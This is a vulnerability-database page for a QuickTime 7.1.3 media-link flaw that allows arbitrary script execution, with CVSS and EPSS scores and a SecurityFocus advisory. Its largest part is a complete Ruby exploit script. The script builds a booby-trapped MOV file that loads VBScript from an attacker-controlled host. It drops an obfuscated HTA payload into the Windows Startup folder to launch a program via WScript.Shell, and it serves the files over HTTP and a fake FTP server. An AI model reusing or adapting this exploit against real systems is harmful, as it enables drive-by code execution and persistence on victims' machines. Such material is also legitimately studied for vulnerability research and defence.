CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Apple QuickTime 7.1.3 Player and Plug-In allows remote attackers to execute arbitrary JavaScript code and possibly conduct other attacks via a QuickTime Media Link (QTL) file with an embed XML element and a qtnext parameter that identifies resources outside of the original domain. NOTE: as of 20070912, this issue has been demonstrated by using instances of Components.interfaces.nsILocalFile and Components.interfaces.nsIProcess to execute arbitrary local files within Firefox and possibly Internet Explorer.
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5
AV:N/AC:L/Au:N/C:N/I:P/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
12.57%
–
–
2022-04-03
–
–
12.57%
–
–
2023-02-26
–
–
12.57%
–
–
2023-03-12
–
–
–
2.18%
–
2023-06-25
–
–
–
2.99%
–
2023-07-09
–
–
–
2.99%
–
2023-07-30
–
–
–
1.98%
–
2023-10-29
–
–
–
1.98%
–
2023-11-12
–
–
–
1.98%
–
2023-11-19
–
–
–
1.98%
–
2023-11-26
–
–
–
1.98%
–
2023-12-17
–
–
–
1.98%
–
2024-03-24
–
–
–
1.98%
–
2024-06-02
–
–
–
1.98%
–
2024-08-25
–
–
–
2.78%
–
2024-12-22
–
–
–
47.03%
–
2025-01-19
–
–
–
49.69%
–
2025-01-19
–
–
–
49.69%
–
2025-03-18
–
–
–
–
7.43%
2025-03-18
–
–
–
–
7.43,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
source: https://www.securityfocus.com/bid/20138/info
Apple QuickTime plug-in is prone to an arbitrary-script-execution weakness when executing QuickTime Media Link files (.qtl).
An attacker can exploit this issue to execute arbitrary script code in the context of the affected application and load local content in a user's browser. Although this weakness doesn't pose any direct security threat by itself, an attacker may use it to aid in further attacks.
QuickTime 7.1.3 is vulnerable; other versions may also be affected.
#!/usr/bin/ruby
#
# (c) 2006 LMH <lmh [at] info-pull.com>
# Original scripting and POC by Aviv Raff (http://aviv.raffon.net).
#
# Description:
# Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the
# fake FTP server (required). HTTP server port can be modified but it's
# not recommended. Adjust as necessary.
#
# see http://projects.info-pull.com/moab/MOAB-03-01-2007.html
require 'socket'
require 'fileutils'
require 'webrick'
trap 0, proc {
puts "-- Terminating: #{$$}"
}
REMOTE_HOST = "192.168.1.133" # Modify to match IP address or hostname
REMOTE_URL = "http://#{REMOTE_HOST}/" # Modify to match target path (ex. /mypath)
TARGET_SCRIPT = "on error resume next\r\n" +
"Set c = CreateObject(\"ADODB.Connection\")\r\n" +
"co = \"Driver={Microsoft Text Driver (*.txt; *.csv)};Dbq=#{REMOTE_URL};Extensions=txt;\"\r\n" +
"c.Open co\r\n" +
"set rs =CreateObject(\"ADODB.Recordset\")\r\n" +
"rs.Open \"SELECT * from qtpoc.txt\", c\r\n" +
"rs.Save \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\poc.hta\", adPersistXML\r\n" +
"rs.close\r\n" +
"c.close\r\n" +
"window.close\r\n"
HTA_PAYLOAD = "<script>q='%77%73%63%72%69%70';</script>\r\n" +
"<script>q+='%74%2E%73%68%65%6C%6C';</script>\r\n" +
"<script>a=new ActiveXObject(unescape(q));</script>\r\n" +
"<script>a.run('%windir%\\\\System32\\\\calc.exe');</script>\r\n" + # executes calc.exe
"<script>window.close();</script>\r\n"
HREFTRACK_COD = "A<res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript src=\"#{REMOTE_URL}q.vbs\" " +
"language=\"vbscript\"%3E%3C/script%3E%3C%21--//|> T<>"
TARGET_DIRECTORY = "served"
#
# ---- Real fun starts here ----
#
puts "++ Preparing files..."
#
# Prepare the MOV file with the HREFTrack pointing at our script.
#
original_mov = File.read("qtpoc.mov")
# Prepare directory structure
FileUtils::mkdir(TARGET_DIRECTORY)
puts "++ MOV file...."
# Write the new MOV file
f = File.new(File.join(TARGET_DIRECTORY, "qtpoc.mov"), "w")
f.write(original_mov)
f.close
puts "++ Script file...."
# Write the script file
f = File.new(File.join(TARGET_DIRECTORY, "q.vbs"), "w")
f.print(TARGET_SCRIPT)
f.close
puts "++ HTA payload file...."
# Write the new HTA file (payload)
f = File.new(File.join(TARGET_DIRECTORY, "qtpoc.txt"), "w")
f.print(HTA_PAYLOAD)
f.close
#
# win32 doesn't like fork ;-)
#
if ARGV[0] == "serve"
# HTTP server... via Webrick
puts "++ Done. Starting HTTP server..."
web_server = WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot =>TARGET_DIRECTORY)
fork do
begin
web_server.start
rescue
exit
end
end
# FTP server....
puts "++ Done. Starting FTP server..."
begin
ftp_server = TCPServer.new('localhost', 21)
rescue
web_server.shutdown
exit
end
# 220 Microsoft FTP Service
# USER anonymous
# 331 Anonymous access allowed, send identity (e-mail name) as password.
# PASS IEUser@
# 230 Anonymous user logged in.
# (...)
while (ftp_session = ftp_server.accept)
puts "++ FTP: #{ftp_session.gets}"
# TODO: implement fake responses just to satisfy it.
ftp_session.close
end
# finished
web_server.shutdown
end